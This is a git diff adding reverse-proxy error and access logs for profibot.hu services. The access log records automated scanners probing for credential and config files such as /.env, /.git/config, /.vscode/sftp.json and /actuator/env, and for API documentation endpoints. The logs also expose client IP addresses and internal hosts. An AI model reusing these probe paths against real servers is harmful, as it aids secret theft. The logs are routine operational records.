+2026/01/19 23:30:30 [error] 252#252: *3346 code-server could not be resolved (2: Server failure), client: 98.88.137.2, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:33:33 [error] 249#249: *3365 code-server could not be resolved (2: Server failure), client: 128.192.12.114, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:34:21 [error] 250#250: *3366 code-server could not be resolved (2: Server failure), client: 46.105.92.110, server: code.profibot.hu, request: "GET /.git/config HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:39:32 [warn] 251#251: *3401 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/48/0000001487 while reading upstream, client: 37.76.11.249, server: code.profibot.hu, request: "GET /stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/nls.messages.js HTTP/1.1", upstream: "http://172.21.0.7:8443/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/nls.messages.js", host: "code.profibot.hu", referrer: "https://code.profibot.hu/?folder=/config/workspace" +2026/01/19 23:39:32 [warn] 251#251: *3408 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/48/0000001488 while reading upstream, client: 37.76.11.249, server: code.profibot.hu, request: "GET /stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/code/browser/workbench/workbench.js HTTP/1.1", upstream: "http://172.21.0.7:8443/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/code/browser/workbench/workbench.js", host: "code.profibot.hu", referrer: "https://code.profibot.hu/?folder=/config/workspace" +2026/01/19 23:39:36 [warn] 252#252: *3411 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/48/0000001489 while reading upstream, client: 37.76.11.249, server: code.profibot.hu, request: "GET /stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/editor/common/services/editorWebWorkerMain.js HTTP/1.1", upstream: "http://172.21.0.7:8443/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/editor/common/services/editorWebWorkerMain.js", host: "code.profibot.hu" +2026/01/19 23:39:36 [warn] 251#251: *3401 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/49/0000001490 while reading upstream, client: 37.76.11.249, server: code.profibot.hu, request: "GET /stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/api/worker/extensionHostWorkerMain.js HTTP/1.1", upstream: "http://172.21.0.7:8443/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/api/worker/extensionHostWorkerMain.js", host: "code.profibot.hu" +2026/01/20 06:44:21 [warn] 256#256: *11738 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/46/0000004463 while reading upstream, client: 84.1.26.27, server: code.profibot.hu, request: "GET /stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/nls.messages.js HTTP/1.1", upstream: "http://172.21.0.7:8443/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/nls.messages.js", host: "code.profibot.hu", referrer: "https://code.profibot.hu/?folder=/home/coder/project" +2026/01/20 06:44:21 [warn] 256#256: *11755 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/46/0000004464 while reading upstream, client: 84.1.26.27, server: code.profibot.hu, request: "GET /stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/code/browser/workbench/workbench.js HTTP/1.1", upstream: "http://172.21.0.7:8443/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/code/browser/workbench/workbench.js", host: "code.profibot.hu", referrer: "https://code.profibot.hu/?folder=/home/coder/project" +2026/01/20 06:44:24 [warn] 256#256: *11768 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/46/0000004465 while reading upstream, client: 84.1.26.27, server: code.profibot.hu, request: "GET /stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/api/worker/extensionHostWorkerMain.js HTTP/1.1", upstream: "http://172.21.0.7:8443/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/api/worker/extensionHostWorkerMain.js", host: "code.profibot.hu" +2026/01/20 06:44:35 [warn] 256#256: *11789 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/46/0000004466 while reading upstream, client: 84.1.26.27, server: code.profibot.hu, request: "GET /stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/welcomeGettingStarted/common/media/extensions.svg?{%22moduleId%22:%22vs/workbench/contrib/welcomeGettingStarted/common/media/extensions.svg%22} HTTP/1.1", upstream: "http://172.21.0.7:8443/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/welcomeGettingStarted/common/media/extensions.svg?{%22moduleId%22:%22vs/workbench/contrib/welcomeGettingStarted/common/media/extensions.svg%22}", host: "code.profibot.hu", referrer: "https://code.profibot.hu/?folder=/home/coder/project" +2026/01/22 22:54:21 [error] 281#281: *227 code-server could not be resolved (2: Server failure), client: 37.76.47.183, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/22 22:54:21 [error] 281#281: *227 code-server could not be resolved (2: Server failure), client: 37.76.47.183, server: code.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "code.profibot.hu", referrer: "https://code.profibot.hu/" +2026/01/22 22:54:23 [error] 281#281: *227 code-server could not be resolved (2: Server failure), client: 37.76.47.183, server: code.profibot.hu, request: "GET /_static/out/browser/serviceWorker.js HTTP/1.1", host: "code.profibot.hu", referrer: "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +2026/01/22 22:54:26 [error] 281#281: *227 code-server could not be resolved (2: Server failure), client: 37.76.47.183, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/22 22:54:27 [error] 281#281: *227 code-server could not be resolved (2: Server failure), client: 37.76.47.183, server: code.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "code.profibot.hu", referrer: "https://code.profibot.hu/" +2026/01/22 22:54:28 [error] 281#281: *227 code-server could not be resolved (2: Server failure), client: 37.76.47.183, server: code.profibot.hu, request: "GET /_static/out/browser/serviceWorker.js HTTP/1.1", host: "code.profibot.hu", referrer: "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +2026/01/22 22:54:59 [error] 281#281: *227 code-server could not be resolved (2: Server failure), client: 37.76.47.183, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/22 22:54:59 [error] 281#281: *227 code-server could not be resolved (2: Server failure), client: 37.76.47.183, server: code.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "code.profibot.hu", referrer: "https://code.profibot.hu/" +2026/01/22 22:55:00 [error] 281#281: *227 code-server could not be resolved (2: Server failure), client: 37.76.47.183, server: code.profibot.hu, request: "GET /_static/out/browser/serviceWorker.js HTTP/1.1", host: "code.profibot.hu", referrer: "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +2026/01/22 22:55:30 [error] 281#281: *227 code-server could not be resolved (2: Server failure), client: 37.76.47.183, server: code.profibot.hu, request: "GET /_static/out/browser/serviceWorker.js HTTP/1.1", host: "code.profibot.hu", referrer: "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +2026/01/22 23:01:39 [error] 280#280: *250 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: code.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.8:8443/", host: "code.profibot.hu" +2026/01/22 23:01:39 [error] 280#280: *250 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: code.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://172.18.0.8:8443/favicon.ico", host: "code.profibot.hu", referrer: "https://code.profibot.hu/" +2026/01/22 23:01:41 [error] 280#280: *250 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: code.profibot.hu, request: "GET /_static/out/browser/serviceWorker.js HTTP/1.1", upstream: "http://172.18.0.8:8443/_static/out/browser/serviceWorker.js", host: "code.profibot.hu", referrer: "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +2026/01/22 23:01:42 [error] 280#280: *250 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: code.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.8:8443/", host: "code.profibot.hu" +2026/01/22 23:01:42 [error] 280#280: *250 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: code.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://172.18.0.8:8443/favicon.ico", host: "code.profibot.hu", referrer: "https://code.profibot.hu/" +2026/01/22 23:01:44 [error] 280#280: *257 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: code.profibot.hu, request: "GET /_static/out/browser/serviceWorker.js HTTP/1.1", upstream: "http://172.18.0.8:8443/_static/out/browser/serviceWorker.js", host: "code.profibot.hu", referrer: "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +2026/01/22 23:02:10 [error] 280#280: *257 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: code.profibot.hu, request: "GET /_static/out/browser/serviceWorker.js HTTP/1.1", upstream: "http://172.18.0.8:8443/_static/out/browser/serviceWorker.js", host: "code.profibot.hu", referrer: "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +2026/01/22 23:02:21 [error] 280#280: *257 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: code.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.8:8443/", host: "code.profibot.hu" +2026/01/22 23:02:21 [error] 280#280: *257 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: code.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://172.18.0.8:8443/favicon.ico", host: "code.profibot.hu", referrer: "https://code.profibot.hu/" +2026/01/22 23:02:22 [error] 280#280: *257 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: code.profibot.hu, request: "GET /_static/out/browser/serviceWorker.js HTTP/1.1", upstream: "http://172.18.0.8:8443/_static/out/browser/serviceWorker.js", host: "code.profibot.hu", referrer: "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +2026/01/22 23:02:52 [error] 280#280: *257 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: code.profibot.hu, request: "GET /_static/out/browser/serviceWorker.js HTTP/1.1", upstream: "http://172.18.0.8:8443/_static/out/browser/serviceWorker.js", host: "code.profibot.hu", referrer: "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +2026/01/22 23:03:22 [error] 280#280: *257 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: code.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://172.18.0.8:8443/", host: "code.profibot.hu" +2026/01/22 23:03:22 [error] 280#280: *257 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: code.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "http://172.18.0.8:8443/favicon.ico", host: "code.profibot.hu", referrer: "https://code.profibot.hu/" +2026/01/22 23:03:23 [error] 280#280: *257 connect() failed (111: Connection refused) while connecting to upstream, client: 37.76.47.183, server: code.profibot.hu, request: "GET /_static/out/browser/serviceWorker.js HTTP/1.1", upstream: "http://172.18.0.8:8443/_static/out/browser/serviceWorker.js", host: "code.profibot.hu", referrer: "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +2026/01/23 07:18:46 [error] 326#326: *2505 recv() failed (104: Connection reset by peer) while proxying upgraded connection, client: 84.1.26.27, server: code.profibot.hu, request: "GET /stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=3bbf4bc4-a999-47af-b164-32be9143784d&reconnection=false&skipWebSocketFrames=false HTTP/1.1", upstream: "http://172.18.0.8:8080/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=3bbf4bc4-a999-47af-b164-32be9143784d&reconnection=false&skipWebSocketFrames=false", host: "code.profibot.hu" +2026/01/23 08:28:32 [warn] 326#326: *5753 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/23/0000002235 while reading upstream, client: 84.1.26.27, server: code.profibot.hu, request: "GET /stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@vscode/vscode-languagedetection/model/group1-shard1of1.bin HTTP/1.1", upstream: "http://172.18.0.8:8080/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@vscode/vscode-languagedetection/model/group1-shard1of1.bin", host: "code.profibot.hu" +2026/01/27 09:00:40 [warn] 232#232: *9812 using uninitialized "server" variable while logging request, client: 84.247.105.135, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" diff --git a/proxy-manager/data/logs/proxy-host-9_access.log b/proxy-manager/data/logs/proxy-host-9_access.log new file mode 100755 index 0000000..3dfae14 --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-9_access.log @@ -0,0 +1,2086 @@ +[20/Jan/2026:19:15:26 +0000] - 405 405 - HEAD http app.profibot.hu "/" [Client 195.123.244.84] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[20/Jan/2026:19:15:28 +0000] - 404 404 - HEAD https app.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:19:15:28 +0000] - 404 404 - HEAD https app.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:19:15:28 +0000] - 404 404 - HEAD https app.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:19:15:28 +0000] - 404 404 - HEAD https app.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[20/Jan/2026:19:15:31 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 159.89.174.87] [Length 4092] [Gzip -] [Sent-to 192.168.100.43] "-" "-" +[20/Jan/2026:19:15:31 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 68.183.180.73] [Length 4092] [Gzip -] [Sent-to 192.168.100.43] "-" "-" +[20/Jan/2026:19:15:32 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 159.89.174.87] [Length 4092] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:33 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 68.183.180.73] [Length 4092] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:33 +0000] - 404 404 - POST http app.profibot.hu "/graphql" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:33 +0000] - 404 404 - POST http app.profibot.hu "/api" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:34 +0000] - 404 404 - POST http app.profibot.hu "/api/graphql" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:34 +0000] - 404 404 - POST https app.profibot.hu "/graphql" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:34 +0000] - 404 404 - POST http app.profibot.hu "/graphql/api" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:34 +0000] - 404 404 - POST http app.profibot.hu "/api/gql" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:35 +0000] - 404 404 - POST https app.profibot.hu "/api" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:35 +0000] - 404 404 - POST https app.profibot.hu "/api/graphql" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:35 +0000] - 404 404 - GET http app.profibot.hu "/swagger-ui.html" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:36 +0000] - 404 404 - POST https app.profibot.hu "/graphql/api" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:36 +0000] - 404 404 - GET http app.profibot.hu "/swagger/index.html" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:37 +0000] - 404 404 - POST https app.profibot.hu "/api/gql" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:37 +0000] - 404 404 - GET http app.profibot.hu "/swagger/swagger-ui.html" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:38 +0000] - 404 404 - GET https app.profibot.hu "/swagger-ui.html" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:38 +0000] - 404 404 - GET http app.profibot.hu "/webjars/swagger-ui/index.html" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:39 +0000] - 404 404 - GET https app.profibot.hu "/swagger/index.html" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:39 +0000] - 404 404 - GET http app.profibot.hu "/swagger.json" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:40 +0000] - 404 404 - GET https app.profibot.hu "/swagger/swagger-ui.html" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:40 +0000] - 404 404 - GET http app.profibot.hu "/swagger/v1/swagger.json" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:41 +0000] - 404 404 - GET https app.profibot.hu "/webjars/swagger-ui/index.html" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:41 +0000] - 404 404 - GET http app.profibot.hu "/v2/api-docs" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:42 +0000] - 404 404 - GET https app.profibot.hu "/swagger.json" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:42 +0000] - 404 404 - GET http app.profibot.hu "/v3/api-docs" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:43 +0000] - 404 404 - GET https app.profibot.hu "/swagger/v1/swagger.json" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:43 +0000] - 404 404 - GET http app.profibot.hu "/api-docs/swagger.json" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:44 +0000] - 404 404 - GET https app.profibot.hu "/v2/api-docs" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:44 +0000] - 404 404 - GET http app.profibot.hu "/api/swagger.json" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:45 +0000] - 404 404 - GET https app.profibot.hu "/v3/api-docs" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:45 +0000] - 404 404 - GET http app.profibot.hu "/@vite/env" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:46 +0000] - 404 404 - GET https app.profibot.hu "/api-docs/swagger.json" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:46 +0000] - 404 404 - GET http app.profibot.hu "/actuator/env" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:47 +0000] - 404 404 - GET https app.profibot.hu "/api/swagger.json" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:47 +0000] - 404 404 - GET http app.profibot.hu "/server" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:48 +0000] - 404 404 - GET https app.profibot.hu "/@vite/env" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:48 +0000] - 404 404 - GET http app.profibot.hu "/.vscode/sftp.json" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:49 +0000] - 404 404 - GET https app.profibot.hu "/actuator/env" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:50 +0000] - 404 404 - GET https app.profibot.hu "/server" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:50 +0000] - 404 404 - GET http app.profibot.hu "/about" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:51 +0000] - 404 404 - GET https app.profibot.hu "/.vscode/sftp.json" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:51 +0000] - 404 404 - GET http app.profibot.hu "/debug/default/view?panel=config" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:52 +0000] - 404 404 - GET http app.profibot.hu "/v2/_catalog" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:53 +0000] - 404 404 - GET https app.profibot.hu "/about" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:53 +0000] - 404 404 - GET http app.profibot.hu "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:54 +0000] - 404 404 - GET https app.profibot.hu "/debug/default/view?panel=config" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:54 +0000] - 404 404 - GET http app.profibot.hu "/server-status" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:55 +0000] - 404 404 - GET https app.profibot.hu "/v2/_catalog" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:55 +0000] - 404 404 - GET http app.profibot.hu "/login.action" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:56 +0000] - 404 404 - GET https app.profibot.hu "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:56 +0000] - 404 404 - GET http app.profibot.hu "/_all_dbs" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:57 +0000] - 404 404 - GET https app.profibot.hu "/server-status" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:57 +0000] - 404 404 - GET http app.profibot.hu "/.DS_Store" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:58 +0000] - 404 404 - GET https app.profibot.hu "/login.action" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:59 +0000] - 404 404 - GET http app.profibot.hu "/.env" [Client 159.89.174.87] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:15:59 +0000] - 404 404 - GET https app.profibot.hu "/_all_dbs" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.830323e23383e22383e21393; +https://leakix.net)" "-" +[20/Jan/2026:19:16:00 +0000] - 404 404 - GET https app.profibot.hu "/.DS_Store" [Client 68.183.180.73] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 